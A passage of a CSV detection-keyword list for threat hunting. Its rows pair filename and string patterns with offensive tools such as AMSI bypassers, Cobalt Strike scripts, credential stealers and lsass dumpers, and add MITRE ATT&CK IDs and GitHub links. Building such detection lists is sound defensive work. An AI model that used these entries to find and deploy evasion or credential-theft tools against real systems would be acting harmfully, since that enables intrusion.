Desktop) Sessions By Patching termsrv.dll File*",".{0,1000}Allow\sMultiple\sRDP\s\(Remote\sDesktop\)\sSessions\sBy\sPatching\stermsrv\.dll\sFile.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","9","4","309","66","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*AllowDelegationUsers.txt*",".{0,1000}AllowDelegationUsers\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*AllowDelegationUsers_samaccountnames_only.txt*",".{0,1000}AllowDelegationUsers_samaccountnames_only\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*almandin/krbjack*",".{0,1000}almandin\/krbjack.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","1","N/A","10","1","85","15","2024-02-08T18:07:25Z","2023-04-16T10:44:55Z" "*AlmondOffSec/PassTheCert*",".{0,1000}AlmondOffSec\/PassTheCert.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213","TA0006 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","1","N/A","10","5","493","62","2023-12-18T16:05:02Z","2022-04-29T09:08:32Z" "*ALPC-TaskSched-LPE*",".{0,1000}ALPC\-TaskSched\-LPE.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*ALPC-TaskSched-LPE.*",".{0,1000}ALPC\-TaskSched\-LPE\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Alphabug_CS*",".{0,1000}Alphabug_CS.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","288","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*Alphabug_CS*",".{0,1000}Alphabug_CS.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","288","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*AlphabugX/csOnvps*",".{0,1000}AlphabugX\/csOnvps.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","288","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*AlphabugX/csOnvps*",".{0,1000}AlphabugX\/csOnvps.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","288","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" "*Already in high integrity, no need to privesc!*",".{0,1000}Already\sin\shigh\sintegrity,\sno\sneed\sto\sprivesc!.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*Already SYSTEM*not elevating*",".{0,1000}Already\sSYSTEM.{0,1000}not\selevating.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","0","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*AlteredSecurity/365-Stealer*",".{0,1000}AlteredSecurity\/365\-Stealer.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","1","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "*alwaysinstallelevated.*",".{0,1000}alwaysinstallelevated\..{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*alwaysinstallelevated.c*",".{0,1000}alwaysinstallelevated\.c.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*alwaysinstallelevated.o*",".{0,1000}alwaysinstallelevated\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*am0nsec/HellsGate*",".{0,1000}am0nsec\/HellsGate.{0,1000}","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","9","845","117","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z" "*amass enum -d *",".{0,1000}amass\senum\s\-d\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*amass-get-rootdomains*",".{0,1000}amass\-get\-rootdomains.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*amass-get-subdomains*",".{0,1000}amass\-get\-subdomains.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*amibypass.exe*",".{0,1000}amibypass\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*amkmjjmmflddogmhpjloimipbofnfjih*",".{0,1000}amkmjjmmflddogmhpjloimipbofnfjih.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*Amnesiac.ps1*",".{0,1000}Amnesiac\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*Amnesiac-main.zip*",".{0,1000}Amnesiac\-main\.zip.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*AMS1-Patch.exe*",".{0,1000}AMS1\-Patch\.exe.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","139","28","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" "*AMSI patched in all powershells*",".{0,1000}AMSI\spatched\sin\sall\spowershells.{0,1000}","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","0","N/A","10","6","564","86","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" "*AMSI_Bypass.ps1*",".{0,1000}AMSI_Bypass\.ps1.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*AMSI_bypass_20*.ps1",".{0,1000}AMSI_bypass_20.{0,1000}\.ps1","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","10","993","161","2022-06-18T16:52:38Z","2021-10-08T17:36:24Z" "*AMSI_patch-main*",".{0,1000}AMSI_patch\-main.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","139","28","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" "*Amsi-Bypass*",".{0,1000}Amsi\-Bypass.{0,1000}","offensive_tool_keyword","Github Username","This repo contains some Antimalware Scan Interface (AMSI) bypass / avoidance methods i found on different Blog Posts.","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","1","N/A","N/A","10","1492","260","2023-03-01T17:09:02Z","2019-05-14T06:09:25Z" "*amsi-bypass*",".{0,1000}amsi\-bypass.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*AmsiBypass.cs*",".{0,1000}AmsiBypass\.cs.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*amsibypass.exe*",".{0,1000}amsibypass\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Amsi-Killer.exe*",".{0,1000}Amsi\-Killer\.exe.{0,1000}","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","10","6","564","86","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" "*Amsi-Killer.sln*",".{0,1000}Amsi\-Killer\.sln.{0,1000}","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","10","6","564","86","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" "*Amsi-Killer.vcxproj*",".{0,1000}Amsi\-Killer\.vcxproj.{0,1000}","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","10","6","564","86","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" "*Amsi-Killer-master*",".{0,1000}Amsi\-Killer\-master.{0,1000}","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","10","6","564","86","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z" "*AmsiOpenSession.cpp*",".{0,1000}AmsiOpenSession\.cpp.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","139","28","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" "*AmsiOpenSession.sln*",".{0,1000}AmsiOpenSession\.sln.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","139","28","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" "*AmsiOpenSession.vcxproj*",".{0,1000}AmsiOpenSession\.vcxproj.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","8","2","139","28","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z" "*AmsiTrigger.exe*",".{0,1000}AmsiTrigger\.exe.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","1","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*AMSITrigger.exe*",".{0,1000}AMSITrigger\.exe.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","9","4","N/A","N/A","N/A","N/A" "*AmsiTrigger_x64.exe*",".{0,1000}AmsiTrigger_x64\.exe.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","1","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*amsitrigger_x64.exe*",".{0,1000}amsitrigger_x64\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*AmsiTrigger_x86.exe*",".{0,1000}AmsiTrigger_x86\.exe.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","1","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*An interactive shell to spoof some LOLBins*",".{0,1000}An\sinteractive\sshell\sto\sspoof\ssome\sLOLBins.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","N/A","8","2","140","18","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z" "*An0nUD4Y/Evilginx2-Phishlets*",".{0,1000}An0nUD4Y\/Evilginx2\-Phishlets.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/Evilginx2-Phishlets","1","0","N/A","10","5","449","214","2023-12-12T08:00:52Z","2020-05-13T05:58:43Z" "*and Credential Guard will not be bypassed*",".{0,1000}and\sCredential\sGuard\swill\snot\sbe\sbypassed.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*andotp2john.py*",".{0,1000}andotp2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*AndrewSpecial.cpp*",".{0,1000}AndrewSpecial\.cpp.{0,1000}","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential 